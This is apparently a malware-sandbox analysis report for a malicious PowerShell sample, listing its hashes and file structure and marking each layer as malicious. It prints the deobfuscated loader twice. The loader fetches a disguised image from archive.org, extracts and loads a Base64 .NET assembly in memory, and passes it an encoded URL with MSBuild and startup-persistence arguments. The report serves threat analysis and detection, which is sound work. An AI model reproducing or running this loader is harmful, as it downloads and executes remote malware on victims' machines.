Malicious
Malicious

438b8b527facf193e4ed9cd204599784

PowerShell
|
MD5: 438b8b527facf193e4ed9cd204599784
|
Size: 1.03 MB
|
application/x-powershell

Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
438b8b527facf193e4ed9cd204599784
Sha1
61fc3716b21cdc8b7faf1bb0d0418005ba11177c
Sha256
ae2d970394457d9ad893549bc338ec70283e04cb30471d5fdb72e15d9cb582c1
Sha384
5edfd81c284a0b5110ec31a374b49ccd165c9d69ad92b3d65795eccf55242ed0f8c41f99894b29e2424306adde45020c
Sha512
f88b3c23a7a315570f451a390caecabc9f42c57fc8843097e9725d60681ea673c57c00f66159e939bc86f18afea45b24b78ad600290d3b5a20311c751d8ef5ee
SSDeep
24576:aysOT1fxiVha1wcnysOT1fxiVha1wc9ysOT1fxiVha1wcK:/sOPAHsOPA/sOPAP
TLSH
6825CF4E3567413AA485B0B8320A5163F09FC7D5C32AF3A2D0B0D469E195CBAE5FA773
File Structure
438b8b527facf193e4ed9cd204599784
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Base64-Block]
Malicious
[Deobfuscated PS]
Malicious
Artefacts
Name
 Value
Deobfuscated PowerShell

$null = ([Encoding]::"ASCII"."GetString"((Invoke-WebRequest "https://archive.org/download/optimized_msi_20250814/optimized_MSI.png" -UseBasicParsing)."Content") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "==Ad4RnLlxWamRWZ0JXZ252bj9yM5EjN2YDMx8Cbk9yZy9mLzVGbpZGctR3LvoDc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "Name_File", "MSBuild", "", "MSBuild", "", "", "", "Name_File", "js", "1", "", "", "0", "startup_onstart") } ))
438b8b527facf193e4ed9cd204599784 (1.03 MB)
File Structure
438b8b527facf193e4ed9cd204599784
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Base64-Block]
Malicious
[Deobfuscated PS]
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
Deobfuscated PowerShell

$null = ([Encoding]::"ASCII"."GetString"((Invoke-WebRequest "https://archive.org/download/optimized_msi_20250814/optimized_MSI.png" -UseBasicParsing)."Content") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "==Ad4RnLlxWamRWZ0JXZ252bj9yM5EjN2YDMx8Cbk9yZy9mLzVGbpZGctR3LvoDc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "Name_File", "MSBuild", "", "MSBuild", "", "", "", "Name_File", "js", "1", "", "", "0", "startup_onstart") } ))

Malicious

438b8b527facf193e4ed9cd204599784 > [Base64-Block]
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙